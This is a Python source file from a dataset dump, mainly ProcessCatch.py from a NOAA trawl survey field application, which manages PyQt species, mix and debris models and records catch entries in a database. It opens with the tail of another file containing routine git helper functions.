    info(branchName + " exists in "+repoPath+":" + str(value))
    print(branchName + " exists in " + repoPath + ":" + str(value))
    return branchName
def pullLatestChangesFromRemoteRepo(repoPath, repoUrl):
    """Run `git pull -a` in *repoPath* and echo its output (repoUrl is unused)."""
    output = executeCommandOnShell("git pull -a", repoPath, True)
    print(output)
def cloneRepo(repoPath, repoUrl):
    """Clone *repoUrl* into *repoPath* via the shell."""
    executeCommandOnShell("git clone {0}".format(repoUrl), repoPath, True)
def checkoutBranch(repoPath, branchName):
    """Force-checkout *branchName* in the repository at *repoPath*."""
    executeCommandOnShell("git checkout -f {0}".format(branchName), repoPath, True)
def gitAddAll(repoPath):
    """Stage every change (`git add -A`) in *repoPath*; output is not echoed."""
    executeCommandOnShell("git add -A",repoPath, False)
def gitCommit(repoPath, commitMessage):
    """Commit the staged changes in *repoPath* with *commitMessage*."""
    executeCommandOnShell('git commit -m "{0}"'.format(commitMessage), repoPath, True)
"sunil8sahu@gmail.com"
] | sunil8sahu@gmail.com |
d572a6814773a8b7f6c85a0e354e12f8655e0a35 | c4ee4a9d28425aa334038ad174c7b1d757ff45db | /py/trawl/ProcessCatch.py | c12d30c7ce3a588dd4ade0e94526c4bea1bcaaf5 | [
"MIT"
] | permissive | nwfsc-fram/pyFieldSoftware | 32b3b9deb06dba4a168083a77336613704c7c262 | 477ba162b66ede2263693cda8c5a51d27eaa3b89 | refs/heads/master | 2023-08-03T07:38:24.117376 | 2021-10-20T22:49:51 | 2021-10-20T22:49:51 | 221,750,910 | 1 | 1 | MIT | 2023-07-20T13:13:25 | 2019-11-14T17:23:47 | Python | UTF-8 | Python | false | false | 56,327 | py | __author__ = 'Todd.Hay'
# -------------------------------------------------------------------------------
# Name: ProcessCatch.py
# Purpose:
#
# Author: Todd.Hay
# Email: Todd.Hay@noaa.gov
#
# Created: Jan 10, 2016
# License: MIT
#-------------------------------------------------------------------------------
from PyQt5.QtCore import pyqtProperty, pyqtSignal, pyqtSlot, QObject, QVariant, Qt, QModelIndex, \
QAbstractItemModel, QByteArray, QAbstractListModel, QItemSelection, QPersistentModelIndex
from PyQt5.Qt import QJSValue, QQmlEngine
from py.common.FramListModel import FramListModel
from py.common.FramTreeModel import FramTreeModel
from py.common.FramTreeItem import FramTreeItem
import logging
import unittest
import pdb
from py.trawl.TrawlBackdeckDB_model import Specimen, Catch, Hauls, SpeciesSamplingPlanLu
from peewee import *
from playhouse.shortcuts import model_to_dict, dict_to_model
from py.common.SoundPlayer import SoundPlayer
class SpeciesListModel(FramListModel):
    """List model backing the available-species table views."""

    # Role names exposed to QML, registered in this exact order.
    _ROLE_NAMES = (
        "taxonomyId", "scientificName", "commonName1", "commonName2",
        "commonName3", "displayName", "protocol", "weight", "count",
        "depthMin", "depthMax", "latMin", "latMax", "isMostRecent",
        "isLastNOperations", "type", "sampleType", "catchContentId",
        "catchId",
    )

    def __init__(self, parent=None):
        super().__init__()
        for role in self._ROLE_NAMES:
            self.add_role_name(name=role)
class SpeciesTreeModel(FramTreeModel):
    """
    Class used for the SelectedSpeciesTreeView. This is a custom FramTreeModel that allows one to add/remove
    mixes, which are hierarchical in nature
    """
    def __init__(self, headers=None, data=None):
        # Bug fix: the defaults were mutable lists ([]), which Python shares
        # across calls/instances; use None sentinels and substitute fresh lists.
        super().__init__(headers=headers if headers is not None else [],
                         data=data if data is not None else [])

    @pyqtSlot(result=QVariant)
    def sortCatch(self):
        """
        Sort the tree in place: species (Taxon) first, then mixes, then debris,
        alphabetically within each category; mixes and submixes are sorted the
        same way internally.
        :return: list of QModelIndex for items that must be re-expanded
        """
        # Tracks items that were expanded so the view can re-expand them afterwards.
        expandedList = []

        typeCol = self.getColumnNumber("type")
        displayNameCol = self.getColumnNumber("displayName")

        # Category precedence at each level of the tree.
        SORT_ORDER = {"Taxon": 0, "Mix": 1, "Debris": 2}
        MIX_SORT_ORDER = {"Taxon": 0, "Submix": 1, "Debris": 2}
        SUBMIX_SORT_ORDER = {"Taxon": 0, "Debris": 1}
        sorted_items = sorted(self._rootItem.childItems, key=lambda x: (SORT_ORDER[x.data(typeCol).value()], x.data(displayNameCol).value().lower()))
        self.removeRows(0, self._rootItem.childCount(), QModelIndex())
        self.setChildItems(sorted_items, QModelIndex())

        # Sort mixes by Taxon > Submix > Debris, then alphabetically within each.
        mixes = [x for x in self._rootItem.childItems if x.data(typeCol).value() == "Mix"]
        for mix in mixes:
            mixIdx = self.createIndex(0, 0, mix)
            # TODO Todd Hay - Fix sorting mixes when mix # >= 10 (lexicographic,
            # not natural, ordering of the numeric suffix)
            # see https://arcpy.wordpress.com/2012/05/11/sorting-alphanumeric-strings-in-python/
            sorted_mix = sorted(mix.childItems, key=lambda x: (MIX_SORT_ORDER[x.data(typeCol).value()], x.data(displayNameCol).value().lower()))
            self.removeRows(0, mix.childCount(), mixIdx)
            self.setChildItems(sorted_mix, mixIdx)
            if mix.isExpanded:
                expandedList.append(mix)

            # Sort submixes by Taxon > Debris, then alphabetically within each.
            submixes = [y for y in mix.childItems if y.data(typeCol).value() == "Submix"]
            for submix in submixes:
                submixIdx = self.createIndex(0, 0, submix)
                # TODO Todd Hay - Fix sorting submixes when mix # >= 10
                sorted_submix = sorted(submix.childItems, key=lambda z: (SUBMIX_SORT_ORDER[z.data(typeCol).value()], z.data(displayNameCol).value().lower()))
                self.removeRows(0, submix.childCount(), submixIdx)
                self.setChildItems(sorted_submix, submixIdx)
                if submix.isExpanded:
                    expandedList.append(submix)

        # Convert the expanded items into current QModelIndex's
        expandedList = [self.createIndex(x.row, 0, x) for i, x in enumerate(expandedList)]

        return expandedList
class ProcessCatch(QObject):
"""
Class for the ProcessCatchScreen. Handles getting all of the species data
"""
haulIdChanged = pyqtSignal()
speciesModelChanged = pyqtSignal()
speciesCountChanged = pyqtSignal()
totalWeightChanged = pyqtSignal()
selectedIndexChanged = pyqtSignal()
activeMixChanged = pyqtSignal()
    def __init__(self, app=None, db=None):
        """
        :param app: the top-level application object (provides state_machine)
        :param db: database access object used for all queries
        """
        super().__init__()
        self._logger = logging.getLogger(__name__)
        self._app = app
        self._db = db

        self._mixes = dict()
        # The mix that newly added species are placed into.
        self._active_mix = {"catchId": None, "displayName": None}

        # Populate lists that are used in the tvAvailableSpecies TableView
        self._species = self._get_species()
        self._recent_species = [s for s in self._species if s["isMostRecent"].upper() == "TRUE"]
        self._debris = self._get_debris()

        # Create the models for the available + selected Table/Tree views
        self.avFullModel = SpeciesListModel()
        self.avRecentModel = SpeciesListModel()
        self.avDebrisModel = SpeciesListModel()
        self.seModel = self._set_selected_species_model()
        self._current_species_model = self.avFullModel

        self._species_count = 0
        self._total_weight = 0
        # Current filter text applied to the available-species lists.
        self._filter = ""

        # Cached special-category species lists used elsewhere in the screen.
        self._corals = self.get_coral_species()
        self._salmon = self.get_salmon_species()
        self._sponges = self.get_sponge_species()
        self._rockfish = self.get_rockfish_species()

        self._sound_player = SoundPlayer()
        self._selected_index = None
    @pyqtProperty(QVariant, notify=activeMixChanged)
    def activeMix(self):
        """
        Return self._active_mix: the currently chosen mix. When a user adds a
        new species to a mix, it is added to this one.
        :return: dict with "catchId" and "displayName" keys
        """
        return self._active_mix

    @activeMix.setter
    def activeMix(self, value):
        """
        Set self._active_mix and notify QML bindings.
        :param value: dict with "catchId" and "displayName" keys
        :return: None
        """
        self._active_mix = value
        self.activeMixChanged.emit()
@pyqtSlot()
def initialize_lists(self):
"""
Method to reset all of the FramListModels to their original state of items. This is called when
the ProcessCatch is first initialized and then also whenever the haul id is changed, as the tree
needs to be rebuilt from the database at that point
:return: None
"""
# Establish working lists for available Full / Recent / Debris lists + filtered variants
self.avFullSpecies = list(self._species)
self.avFullSpeciesFiltered = list(self._species)
self.avRecentSpecies = list(self._recent_species)
self.avRecentSpeciesFiltered = list(self._recent_species)
self.avDebris = list(self._debris)
self.avDebrisFiltered = list(self._debris)
# Reset the list items
self.avFullModel.setItems(self.avFullSpeciesFiltered)
self.avRecentModel.setItems(self.avRecentSpeciesFiltered)
self.avDebrisModel.setItems(self.avDebrisFiltered)
def _get_fram_protocols(self):
"""
Method to gather the protocol display name for the FRAM protocols
:return: dict - containing taxon_id: protocol name
"""
protocols = []
protocol_sql = """
SELECT taxonomy_id, display_name FROM SPECIES_SAMPLING_PLAN_LU WHERE
PLAN_NAME = 'FRAM Standard Survey' AND
DISPLAY_NAME != 'Whole Specimen ID'
"""
# AND
# DISPLAY_NAME != 'Coral' AND
# DISPLAY_NAME != 'Salmon';
protocols = self._db.execute(query=protocol_sql)
protocols = {x[0]: x[1] for x in protocols}
return protocols
    @pyqtSlot()
    def initialize_tree(self):
        """
        Method called when the haul id is changed that initializes the selected
        species tree (seModel) with this haul's CATCH rows from the database.
        Taxa/mixes/submixes/debris are inserted hierarchically, matching items
        are removed from the available-species list models, and the running
        species count and total weight are updated.
        :return: None
        """
        model = self.seModel

        # Clear the tree + it's descendants list
        model.clear()
        self.speciesCount = 0
        total_weight = 0

        # Column keys of the SQL result set, in SELECT order.
        keys = ["catchId", "parentCatchId", "displayName", "isMix", "isDebris", "taxonomyId", "scientificName",
                "commonName1", "commonName2", "commonName3",
                "depthMin", "depthMax", "latMin", "latMax",
                "weight", "count", "isMostRecent", "isLastNOperations", "catchContentId", "protocol"]
        # Subset of keys actually pushed into the tree items.
        dataKeys = ["catchId", "displayName", "taxonomyId", "scientificName",
                "commonName1", "commonName2", "commonName3",
                "depthMin", "depthMax", "latMin", "latMax",
                "weight", "count", "isMostRecent", "isLastNOperations", "type", "catchContentId", "protocol"]

        # Returns a dictionary of taxon_id: protocol name - these are used to compare against the sql query below
        # to set the protocol display to a FRAM Standard Survey protocol name if one exists, otherwise, use what is
        # retrieved from the query
        protocols = self._get_fram_protocols()

        sql = """
            SELECT c.CATCH_ID, c.PARENT_CATCH_ID, c.DISPLAY_NAME, c.IS_MIX, c.IS_DEBRIS, cc.TAXONOMY_ID,
                t.SCIENTIFIC_NAME, t.COMMON_NAME_1, t.COMMON_NAME_2, t.COMMON_NAME_3,
                t.HISTORICAL_DEPTH_MIN, t.HISTORICAL_DEPTH_MAX, t.HISTORICAL_LAT_MIN, t.HISTORICAL_LAT_MAX,
                c.weight_kg, c.sample_count_int, cc.IS_MOST_RECENT, cc.IS_LAST_N_OPERATIONS, cc.CATCH_CONTENT_ID,
                s.DISPLAY_NAME
            FROM CATCH c
                LEFT JOIN CATCH_CONTENT_LU cc ON c.CATCH_CONTENT_ID = cc.CATCH_CONTENT_ID
                LEFT JOIN TAXONOMY_LU t ON t.TAXONOMY_ID = cc.TAXONOMY_ID
                LEFT JOIN SPECIES_SAMPLING_PLAN_LU s ON t.TAXONOMY_ID = s.TAXONOMY_ID
            WHERE c.OPERATION_ID = ?
            GROUP BY CATCH_ID
            ORDER BY CATCH_ID
        """
        params = [self._app.state_machine._haul["haul_id"], ]
        results = self._db.execute(query=sql, parameters=params).fetchall()
        if results:
            results = [dict(zip(keys, values)) for values in results]
            for x in results:
                # Derive the item type from the IS_MIX / IS_DEBRIS flags.
                if x["isMix"].lower() == "false" and x["isDebris"].lower() == "false":
                    x["type"] = "Taxon"
                elif x["isMix"].lower() == "true" and x["isDebris"].lower() == "false":
                    if "submix" in x["displayName"].lower():
                        x["type"] = "Submix"
                    else:
                        x["type"] = "Mix"
                        if isinstance(self._active_mix, QJSValue):
                            self._active_mix = self._active_mix.toVariant()
                        # The first mix encountered becomes the active mix.
                        if self._active_mix["catchId"] is None:
                            self.activeMix = {"displayName": x["displayName"], "catchId": x["catchId"]}
                elif x["isMix"].lower() == "false" and x["isDebris"].lower() == "true":
                    x["type"] = "Debris"

                # Update weights / counts
                totals = self._get_basket_weights_counts(catch_id=x["catchId"])
                x["weight"] = totals["weight"]
                x["count"] = totals["count"]

                # Update protocol display using the protocols dict obtained above
                x["protocol"] = protocols[x["taxonomyId"]] if x["taxonomyId"] in protocols else x["protocol"]

            firstLevelItems = [x for x in results if x["parentCatchId"] is None]
            for item in firstLevelItems:
                # Get the data items
                data = {x: item[x] for x in item if x in dataKeys}

                # Update the total weight
                total_weight += data["weight"]

                # Set None values to ""
                data.update((k, "") for k, v in data.items() if v is None)

                # Add to the FramTreeView
                parentIdx = self.append_tree_item(data=data, parentIdx=QModelIndex())

                # Remove from the FramListModel, i.e. the left-side ListView
                if data["type"] != "Mix" and data["type"] != "Submix":
                    self.remove_list_item(data=data)

                # For a mix, add children to the mix
                if data["type"] == "Mix":
                    # Update the FramTreeModel self._mixCount
                    model.addMixCount("Mix")

                    # Get all of the Mix children, add those, but don't get/add the Mix baskets (the last argument)
                    children = [x for x in results if x["parentCatchId"] == item["catchId"] and x["type"] != "Mix"]
                    for child in children:
                        # Add to the FramTreeView
                        childData = {x: child[x] for x in child if x in dataKeys}
                        childData.update((k, "") for k, v in childData.items() if v is None)
                        subparentIdx = self.append_tree_item(data=childData, parentIdx=parentIdx)

                        # Remove from the FramListModel
                        if childData["type"] != "Submix" and childData["type"] != "Mix":
                            self.remove_list_item(data=childData)

                        # Add Submixes
                        if childData["type"] == "Submix":
                            # Update the running count of the submixes for the given mix
                            model.addMixCount("Submix", parentIdx)

                            # Get the submix children, but don't get/add the submix baskets (the last argument here)
                            subchildren = [x for x in results if x["parentCatchId"] == child["catchId"] and x["type"] != "Submix"]
                            for subchild in subchildren:
                                # Add to the FramTreeView
                                subchildData = {x: subchild[x] for x in subchild if x in dataKeys}
                                subchildData.update((k, "") for k, v in subchildData.items() if v is None)
                                self.append_tree_item(data=subchildData, parentIdx=subparentIdx)

                                # Remove from the FramListModel
                                self.remove_list_item(data=subchildData)

            model.sortCatch()

        self.totalWeight = total_weight

        logging.info("Initializing tree, mixes: {0}".format(self.seModel.mixCount))
@pyqtSlot(str)
def playSound(self, sound_name):
"""
Play a sound
:param sound_name:
:return:
"""
if not isinstance(sound_name, str):
return
self._sound_player.play_sound(sound_name=sound_name)
@staticmethod
def _filter_model(filter_text, data, type):
"""
Method to return a filtered list of the species matching the filter_text
:param filter_text: text against which to query
:param species: listing of the input species to query
:return: filtered list
"""
if type == "Debris":
return [d for d in data if filter_text.upper() in d['displayName'].upper()]
else:
filtered_list = [d for d in data
if (filter_text.upper() in d['displayName'].upper() or
filter_text.upper() in d['scientificName'].upper()or
(d["commonName1"] is not None and filter_text.upper() in d['commonName1'].upper()) or
(d["commonName2"] is not None and filter_text.upper() in d['commonName2'].upper()) or
(d["commonName3"] is not None and filter_text.upper() in d['commonName3'].upper()))]
if filter_text == "":
return filtered_list
start_match_list = [x for x in filtered_list if x['displayName'].upper().startswith(filter_text.upper())]
# start_match_list = sorted(start_match_list, key=lambda x: x["displayName"].lower())
remaining_list = [x for x in filtered_list if x not in start_match_list]
# remaining_list = sorted(remaining_list, key=lambda x: x["displayName"].lower())
sorted_list = start_match_list + remaining_list
return sorted_list
    @pyqtSlot(str)
    def filter_species(self, filter_text=""):
        """
        Method used to filter the available-species list models based on what
        the user types in the textbox; refreshes the Full, Recent, and Debris
        filtered lists and their models.
        :param filter_text: Text that the user entered to filter the species
        :return: None
        """
        # Remember the filter so add/remove operations can honor it later.
        self._filter = filter_text
        self.avFullSpeciesFiltered = self._filter_model(filter_text=filter_text, data=self.avFullSpecies, type="Taxon")
        self.avFullModel.setItems(self.avFullSpeciesFiltered)
        self.avRecentSpeciesFiltered = self._filter_model(filter_text=filter_text, data=self.avRecentSpecies, type="Taxon")
        self.avRecentModel.setItems(self.avRecentSpeciesFiltered)
        self.avDebrisFiltered = self._filter_model(filter_text=filter_text, data=self.avDebris, type="Debris")
        self.avDebrisModel.setItems(self.avDebrisFiltered)
    @pyqtSlot(QModelIndex, result=bool)
    def add_list_item(self, index):
        """
        Method to add a species back to the tvAvailableList FramListModel
        (working lists + the visible models when it passes the current filter).
        Mixes/submixes are recursed so each of their children is re-added.
        :param index: QModelIndex - tree item to add back
        :return: bool - False for an invalid index, True otherwise
        """
        if not isinstance(index, QModelIndex):
            return False

        # Add to the Full List Model
        item = self.seModel.getItem(index)
        data = item.getAllDataAsDict()

        # Clear out any weight + count data, i.e. if baskets had been taken, otherwise these could reappear
        # when the item is added back to the TreeView
        data["count"] = None
        data["weight"] = None

        # NOTE: "type" shadows the builtin here; kept as-is.
        type = data["type"]
        # Name fields used to decide whether the item passes the active filter.
        filterList = [v for k, v in data.items() if v != "" and v is not None and k in ("displayName", "scientificName", "commonName1", "commonName2", "commonName3")]

        if type == "Debris":
            # Strip the tree-view prefix before returning it to the debris list.
            data["displayName"] = data["displayName"].replace("Debris - ", "")
            self.avDebris.append(data)
            self.avDebris = sorted(self.avDebris, key=lambda k: k['displayName'].lower())
            if any(self._filter.lower() in x.lower() for x in filterList):
                self.avDebrisModel.appendItem(data)
                self.avDebrisModel.sort("displayName")
                self.avDebrisFiltered.append(data)
                self.avDebrisFiltered = sorted(self.avDebrisFiltered, key=lambda k: k['displayName'].lower())

        elif type == "Mix" or type == "Submix":
            # Need to recurse these to get all children and add back to the list
            for child in item.children:
                newIndex = self.seModel.createIndex(child.row, 0, child)
                self.add_list_item(newIndex)

        elif type == "Taxon":
            self.avFullSpecies.append(data)
            self.avFullSpecies = sorted(self.avFullSpecies, key=lambda k: k['displayName'].lower())

            # Check if the item passes the active filter before showing it.
            if any(self._filter.lower() in x.lower() for x in filterList):
                self.avFullModel.appendItem(data)
                self.avFullModel.sort("displayName")
                self.avFullSpeciesFiltered.append(data)
                self.avFullSpeciesFiltered = sorted(self.avFullSpeciesFiltered, key=lambda k: k['displayName'].lower())

            # TODO Todd Hay - are we using isMostRecent or isLastNOperations - probably the latter
            if data["isMostRecent"] == "True":
                self.avRecentSpecies.append(data)
                self.avRecentSpecies = sorted(self.avRecentSpecies, key=lambda k: k['displayName'].lower())
                if any(self._filter.lower() in x.lower() for x in filterList):
                    self.avRecentModel.appendItem(data)
                    self.avRecentModel.sort("displayName")
                    self.avRecentSpeciesFiltered.append(data)
                    self.avRecentSpeciesFiltered = sorted(self.avRecentSpeciesFiltered, key=lambda k: k['displayName'].lower())

        return True
    @pyqtSlot(QVariant)
    def remove_list_item(self, data):
        """
        Method to remove an item from the available-species FramListModels and
        the matching working/filtered lists, matching by displayName.
        :param data: dict (or QJSValue wrapping one) of the item to delete
        :return: None
        """
        if isinstance(data, QJSValue):
            data = data.toVariant()

        rolename = "displayName"
        value = data[rolename]
        # NOTE: "type" shadows the builtin here; kept as-is.
        type = data["type"]
        if type == "Taxon":
            idx = self.avFullModel.get_item_index(rolename=rolename, value=value)
            if idx >= 0:
                self.avFullModel.removeItem(idx)
                self.avFullSpecies = [x for x in self.avFullSpecies if x["displayName"] != value]
                self.avFullSpeciesFiltered = [x for x in self.avFullSpeciesFiltered if x["displayName"] != value]

            # Recent entries are mirrored in a second model/list pair.
            if data["isMostRecent"] == "True":
                idx = self.avRecentModel.get_item_index(rolename=rolename, value=value)
                if idx >= 0:
                    self.avRecentModel.removeItem(idx)
                    self.avRecentSpecies = [x for x in self.avRecentSpecies if x["displayName"] != value]
                    self.avRecentSpeciesFiltered = [x for x in self.avRecentSpeciesFiltered if x["displayName"] != value]

        elif type == "Debris":
            idx = self.avDebrisModel.get_item_index(rolename=rolename, value=value)
            if idx >= 0:
                self.avDebrisModel.removeItem(idx)
                self.avDebris = [x for x in self.avDebris if x["displayName"] != value]
                self.avDebrisFiltered = [x for x in self.avDebrisFiltered if x["displayName"] != value]
def append_tree_item(self, data, parentIdx):
    """
    Method to insert a row in the self._selected_species_model model. This is done during the initialization
    of the TreeView only, as we don't want to insert new records into the database. See append_tree_item_with_sql
    when a user actually chooses to add a new item to the TreeView
    :param data: QJSValue dict - data to be appended as a new row
    :param parentIdx: QModelIndex - index of the currently selected item in tvSelectedSpecies
    :return: QModelIndex - index (column 0) of the newly created row
    """
    model = self.seModel
    # Attach under the supplied parent when the index is valid, else under the root.
    if isinstance(parentIdx, QModelIndex) and parentIdx.row() >= 0:
        parentItem = model.getItem(parentIdx)
    else:
        parentIdx = QModelIndex()
        parentItem = model._rootItem
    if isinstance(data, QJSValue):
        data = data.toVariant()  # Convert from QJSValue to dict
    # Append one empty row at the end of the parent's children, then fill it in below.
    status = model.insertRows(parentItem.childCount(), 1, parentIdx)
    child = parentItem.child(parentItem.childCount()-1)
    row = child.row
    # Update the speciesCount - I call the method which then emits a signal
    if data["type"] == "Taxon":
        self.speciesCount += 1
    # Update the newly created child/row data with the data from tvAvailableSpecies model
    for element in data:
        if element in model.rootData:  # and data[element] is not None and data[element] != "":
            column = model.getColumnNumber(element)
            if column >= 0:
                index = model.createIndex(row, column, child)
                role = model.getRoleNumber(role_name=element)
                # Debris rows are displayed with a "Debris - " prefix.
                if element == "displayName" and data["type"] == "Debris":
                    data[element] = "Debris - " + data[element]
                status = model.setData(index, data[element], role)
    # Update the model._descendantSpecies list - do this after the data has been updated
    colNum = model.getColumnNumber("taxonomyId")
    taxonId = child.data(colNum)
    if taxonId.value():
        model.append_descendant(taxonId)
    return model.createIndex(row, 0, child)
@pyqtProperty(int, notify=haulIdChanged)
def haulId(self):
    """
    Return the current haul id.
    NOTE(review): this getter has a side effect - it re-initializes the
    selected-species tree on every read; confirm this is intentional.
    :return: int - the current haul id
    """
    self._initialize_tree()
    return self._haul_id

@haulId.setter
def haulId(self, value):
    """
    Set the haul id and notify listeners.
    NOTE(review): the passed-in value is ignored; the id is always taken
    from the state machine's current haul - confirm this is intentional.
    :param value: unused
    """
    self._haul_id = self._app.state_machine._haul["haul_id"]
    self.haulIdChanged.emit()
@pyqtProperty(float, notify=totalWeightChanged)
def totalWeight(self):
    """
    Method to return the total weight for the haul
    :return: float - total haul weight
    """
    return self._total_weight

@totalWeight.setter
def totalWeight(self, value):
    """
    Set the total haul weight and emit totalWeightChanged.

    Fix/generalization: the previous implementation silently rejected
    integer weights (isinstance(value, float) only). Any real number is
    now accepted and stored as a float; booleans are excluded explicitly
    because bool is a subclass of int.
    :param value: int | float - weight to store
    :return: None
    """
    if isinstance(value, bool) or not isinstance(value, (int, float)):
        return
    self._total_weight = float(value)
    self.totalWeightChanged.emit()
@pyqtProperty(int, notify=speciesCountChanged)
def speciesCount(self):
    """
    Return the species_count
    :return: int - species_count
    """
    return self._species_count

@speciesCount.setter
def speciesCount(self, value):
    """
    Set the self._species_count and emit speciesCountChanged.
    :param value: int - value to set it to; None is ignored
    :return: None
    """
    if value is None:
        return
    self._species_count = value
    self.speciesCountChanged.emit()
@pyqtProperty(QObject, notify=speciesModelChanged)
def currentSpeciesModel(self):
    """
    Property used to know if the currently selected speciesModel is the Full List or the
    Most Recent List
    :return: QObject - the currently active species model
    """
    return self._current_species_model

@currentSpeciesModel.setter
def currentSpeciesModel(self, model):
    """
    Method for setting the self._current_species_model; emits speciesModelChanged.
    :param model: the model to make current (no validation is performed)
    :return: None
    """
    self._current_species_model = model
    self.speciesModelChanged.emit()
@pyqtProperty(QVariant)
def species(self):
    """
    Get the full listing of species
    :return: List of species dicts (see _get_species)
    """
    return self._species
@pyqtProperty(FramListModel, notify=speciesModelChanged)
def FullAvailableSpeciesModel(self):
    """
    Get the model for the tvAvailableSpecies TableView
    :return: FramListModel - the full available-species model
    """
    return self.avFullModel
# TODO (todd.hay) Implement NOTIFY signal per warning I'm receiving and discussion of it here:
# http://stackoverflow.com/questions/6728615/warning-about-non-notifyable-properties-in-qml
@pyqtProperty(FramListModel, notify=speciesModelChanged)
def MostRecentAvailableSpeciesModel(self):
    """
    Return the model of the most recent available species
    :return: FramListModel
    """
    return self.avRecentModel
@pyqtProperty(FramTreeModel, notify=speciesModelChanged)
def SelectedSpeciesModel(self):
    """
    Return the model of the selected species, a FramTreeModel
    :return: FramTreeModel
    """
    return self.seModel
@pyqtProperty(FramListModel, notify=speciesModelChanged)
def DebrisModel(self):
    """
    Return the model of the debris, a FramListModel
    :return: FramListModel
    """
    return self.avDebrisModel
@pyqtSlot(QModelIndex, result=QVariant)
def getParent(self, idx):
    """
    Resolve the parent tree item for the given index: the item itself when
    it is a Mix or Submix, otherwise the root item of the selected-species
    model.
    :param idx: QModelIndex - index of the currently selected row
    :return: the parent FramTreeItem
    """
    model = self.seModel
    node_type = model.data(idx, model.get_role_number("type")).value()
    if node_type in ("Mix", "Submix"):
        return model.item(idx).value()
    return model._rootItem
@pyqtSlot(QModelIndex, QVariant, result=bool)
def checkTaxonId(self, idx, selection):
    """
    Method to determine if a species with the given taxonomy id already exists in the current
    level of the tvSelectedSpecies FramTreeModel. If so, don't add it, just highlight that row
    :param idx: QModelIndex - index of the selected row in tvSelectedSpecies
    :param selection: rows currently selected in the available-species view
    :return: bool - true or false if the taxon_id already exists

    NOTE(review): this appears to be an unfinished stub - the loop only logs
    each selected row and `result` is always False, so no duplicate check is
    actually performed yet.
    """
    sel_model = self.seModel
    root = sel_model._rootItem
    # rootIndex = model.createIndex(root.row, 0, root)
    taxonCol = sel_model.get_role_number("taxonomyId")
    typeCol = sel_model.get_role_number("type")
    # Duplicates would be checked within the selected Mix/Submix, else at root level.
    type = sel_model.data(idx, typeCol).value()
    if type and (type == "Mix" or type == "Submix"):
        parent = sel_model.item(idx).value()
    else:
        parent = root
    logging.info('selection: ' + str(selection))
    for row in selection:  # self.currentSpeciesModel.selectionModel():
        logging.info("row: " + str(row))
    result = False
    return result
@pyqtSlot(QJSValue, QModelIndex, str)
def append_tree_item_with_sql(self, data, idx, parent_type):
    """
    Method to insert a row in the self._selected_species_model model AND persist
    a matching record in the CATCH table for the current haul.
    :param data: QJSValue dict - data to be appended as a new row
    :param idx: QModelIndex - index of the currently selected item in tvSelectedSpecies
    :param parent_type: str - the type of entry currently selected: Mix, Submix, Taxon, or Debris
    :return: None
    """
    if isinstance(data, QJSValue):
        data = data.toVariant()  # Convert from QJSValue to dict

    # Get references to key objects of interest
    model = self.seModel
    dataType = data["type"]

    # Insert a new row and get a handle to the newly inserted child + it's row position.
    # Non-debris items added while a Mix/Submix is selected nest under it;
    # everything else (including all Debris) attaches to the root.
    if (parent_type == "Mix" or parent_type == "Submix") and dataType != "Debris":  # Mix is the current type
        parent = model.getItem(idx)
        parentIdx = idx
    # elif parent_type == "Taxon" or parent_type == "Debris":     # Taxon or Debris is the current type
    #     parent = model._rootItem
    #     parentIdx = QModelIndex()
    else:  # Type is None - nothing is selected
        parent = model._rootItem
        parentIdx = QModelIndex()

    # insertRows > position, count, parent index
    status = model.insertRows(parent.childCount(), 1, parentIdx)
    # status = model.insertRows(parent.childCount(), 1, idx.parent())
    child = parent.child(parent.childCount()-1)
    row = child.row

    # Update the speciesCount - I call the method which then emits a signal
    if dataType == "Taxon":
        self.speciesCount += 1

    # Update the newly created child/row data with the data from tvAvailableSpecies model
    for element in data:
        if element in model.rootData:  # and data[element] is not None:  # and data[element] != "":
            column = model.getColumnNumber(element)
            if column >= 0:
                index = model.createIndex(row, column, child)
                role = model.getRoleNumber(role_name=element)
                # Debris rows get a "Debris - " display prefix in the tree.
                if element == "displayName" and data["type"] == "Debris":
                    data[element] = "Debris - " + data[element]
                status = model.setData(index, data[element], role)

    # Update the model._descendantSpecies list - do this after the data has been updated
    colNum = model.getColumnNumber("taxonomyId")
    taxonId = child.data(colNum)
    if taxonId.value():
        model.append_descendant(taxonId)

    # Insert new record in the CATCH table for the given haul.
    # NOTE: IS_MIX / IS_DEBRIS are persisted as the strings "True"/"False".
    is_debris = "False"
    is_mix = "False"
    displayName = data["displayName"]
    catchContentId = None
    if data["type"] == "Debris":
        # Strip the UI-only prefix before persisting.
        displayName = displayName.replace("Debris - ", "")
        is_debris = "True"
        catchContentId = data["catchContentId"]
    elif data["type"] == "Mix" or data["type"] == "Submix":
        is_mix = "True"
    elif data["type"] == "Taxon":
        catchContentId = data["catchContentId"]

    # Determine if a PARENT_CATCH_ID exists for this record or not
    parentCatchId = None
    if parent.data(model.getColumnNumber("displayName")).value() != "displayName":
        parentCatchId = parent.data(model.getColumnNumber("catchId")).value()

    # TODO todd hay - remove MIX_NUMBER from CATCH table - do we need this anymore?
    # TODO todd hay - CATCH Table - Drop OPERATION_TYPE_ID
    sql = "INSERT INTO CATCH (PARENT_CATCH_ID, CATCH_CONTENT_ID, DISPLAY_NAME, IS_MIX, IS_DEBRIS, OPERATION_ID) " + \
          "VALUES(?, ?, ?, ?, ?, ?);"
    params = [parentCatchId, catchContentId, displayName, is_mix, is_debris, self._app.state_machine._haul["haul_id"]]
    # print('params: ' + str(params))
    result = self._db.execute(query=sql, parameters=params)
    if result:
        # Write the new CATCH_ID back into the tree row so later edits/deletes
        # can find the database record.
        catchId = self._db.get_last_rowid()
        column = model.getColumnNumber("catchId")
        index = model.createIndex(row, column, child)
        role = model.getRoleNumber(role_name="catchId")
        status = model.setData(index, catchId, role)
@pyqtSlot(QModelIndex)
def remove_tree_item(self, index):
    """
    Method to remove a FramTreeItem from the FramTreeModel, fix up the species
    count / active mix, and delete the matching CATCH + SPECIMEN records
    (including all descendants) from the database.
    :param index: QModelIndex - the item to remove
    :return: None
    """
    if not isinstance(index, QModelIndex):
        return
    model = self.seModel

    # Get the existing catchId from the data - Do before deleting the actual row
    item = model.getItem(index)
    typeCol = model.getColumnNumber("type")
    catchId = item.data(model.getColumnNumber("catchId")).value()
    type = item.data(typeCol).value()
    if type == "Taxon":
        self.speciesCount -= 1
    elif type == "Mix":
        if isinstance(self._active_mix, QJSValue):
            self._active_mix = self._active_mix.toVariant()
        # Clear the active mix if we're deleting it.
        if catchId == self._active_mix["catchId"]:
            self.activeMix = {"displayName": None, "catchId": None}
        # recurse to check all children + subchildren
        self.speciesCount -= len([x for x in item.children if x.data(typeCol).value() == "Taxon"])
        submixes = [x for x in item.children if x.data(typeCol).value() == "Submix"]
        for submix in submixes:
